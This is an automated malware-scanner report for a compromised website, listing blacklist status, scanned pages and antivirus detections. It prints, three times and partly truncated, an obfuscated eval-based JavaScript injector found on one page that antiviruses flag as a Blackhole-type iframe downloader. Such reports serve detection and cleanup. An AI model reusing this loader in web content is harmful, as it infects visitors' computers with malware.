Malware Scanner report for jabmee-tyubu.com

Malicious/Suspicious/Total urls checked: 3/6/15

9 pages have malicious or suspicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "jabmee-tyubu.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=jabmee-tyubu.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://jabmee-tyubu.com/	200 OK Content-Length: 21392 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" language="javascript" > ... 3835 bytes are skipped ... </script>
http://jabmee-tyubu.com/index.html	200 OK Content-Length: 21392 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" language="javascript" > ... 3835 bytes are skipped ... </script>
http://jabmee-tyubu.com/photo/25soukai/news2.html	200 OK Content-Length: 10513 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_78_6d_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_78_6d_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_71_76_76_7c_6d_6b_70_36_77_7a_6f_36_7a_7d_37_6b_77_7d_76_7c_6d_7a_36_78_70_78_2f_43_15_12_28_78_6d_36_7b_7c_ ... 3153 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);} Antivirus reports: AntiVir JS/BlacoleRef.CZ.29 Avast JS:Decode-AQB [Trj] Emsisoft Trojan.JS.Agent.JBT (B) CAT-QuickHeal JS/Iframe.DEG DrWeb JS.IFrame.457 Kaspersky Trojan-Downloader.JS.Iframe.deg Fortinet JS/Iframe.DDG!tr.dldr NANO-Antivirus Trojan.Script.Expack.bvtkmp Norman Blacole.UC GData Trojan.JS.Agent.JBT BitDefender Trojan.JS.Agent.JBT
http://jabmee-tyubu.com/photo/25soukai/	403 Forbidden Content-Length: 1267 Content-Type: text/html	clean
http://jabmee-tyubu.com/test404page.js	404 Not Found Content-Length: 1242 Content-Type: text/html	clean
http://jabmee-tyubu.com/photo/25soukai/index.html	404 Not Found Content-Length: 1242 Content-Type: text/html	clean
http://jabmee-tyubu.com/photo/25soukai/../../index.html	200 OK Content-Length: 21392 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" language="javascript" > ... 3835 bytes are skipped ... </script>
http://jabmee-tyubu.com/photo/25soukai/../../	200 OK Content-Length: 21392 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" language="javascript" > ... 3835 bytes are skipped ... </script>
http://jabmee-tyubu.com/photo/25soukai/../../photo/25soukai/news2.html	200 OK Content-Length: 10513 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_78_6d_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_78_6d_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_71_76_76_7c_6d_6b_70_36_77_7a_6f_36_7a_7d_37_6b_77_7d_76_7c_6d_7a_36_78_70_78_2f_43_15_12_28_78_6d_36_7b_7c_ ... 3153 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);} Antivirus reports: AntiVir JS/BlacoleRef.CZ.29 Avast JS:Decode-AQB [Trj] Emsisoft Trojan.JS.Agent.JBT (B) CAT-QuickHeal JS/Iframe.DEG DrWeb JS.IFrame.457 Kaspersky Trojan-Downloader.JS.Iframe.deg Fortinet JS/Iframe.DDG!tr.dldr NANO-Antivirus Trojan.Script.Expack.bvtkmp Norman Blacole.UC GData Trojan.JS.Agent.JBT BitDefender Trojan.JS.Agent.JBT
http://jabmee-tyubu.com/photo/25soukai/../../photo/25soukai/	403 Forbidden Content-Length: 1267 Content-Type: text/html	clean
http://jabmee-tyubu.com/photo/25soukai/../../photo/25soukai/index.html	404 Not Found Content-Length: 1242 Content-Type: text/html	clean
http://jabmee-tyubu.com/photo/25soukai/../../photo/25soukai/../../index.html	200 OK Content-Length: 21392 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" language="javascript" > ... 3835 bytes are skipped ... </script>
http://jabmee-tyubu.com/photo/25soukai/../../photo/25soukai/../../	200 OK Content-Length: 21392 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" language="javascript" > ... 3835 bytes are skipped ... </script>
http://jabmee-tyubu.com/photo/25soukai/../../photo/25soukai/../../photo/25soukai/news2.html	200 OK Content-Length: 10513 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_78_6d_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_78_6d_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_71_76_76_7c_6d_6b_70_36_77_7a_6f_36_7a_7d_37_6b_77_7d_76_7c_6d_7a_36_78_70_78_2f_43_15_12_28_78_6d_36_7b_7c_ ... 3153 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);} Antivirus reports: AntiVir JS/BlacoleRef.CZ.29 Avast JS:Decode-AQB [Trj] Emsisoft Trojan.JS.Agent.JBT (B) CAT-QuickHeal JS/Iframe.DEG DrWeb JS.IFrame.457 Kaspersky Trojan-Downloader.JS.Iframe.deg Fortinet JS/Iframe.DDG!tr.dldr NANO-Antivirus Trojan.Script.Expack.bvtkmp Norman Blacole.UC GData Trojan.JS.Agent.JBT BitDefender Trojan.JS.Agent.JBT
http://jabmee-tyubu.com/photo/25soukai/../../photo/25soukai/../../photo/25soukai/	403 Forbidden Content-Length: 1267 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: jabmee-tyubu.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Sep 2014 05:03:28 GMT
Accept-Ranges: bytes
ETag: "5a31300-5390-50341d802d444"
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.1h
Content-Length: 21392
Content-Type: text/html
Last-Modified: Wed, 17 Sep 2014 12:16:55 GMT

...21392 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: jabmee-tyubu.com
Referer: http://www.google.com/search?q=jabmee-tyubu.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for jabmee-tyubu.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools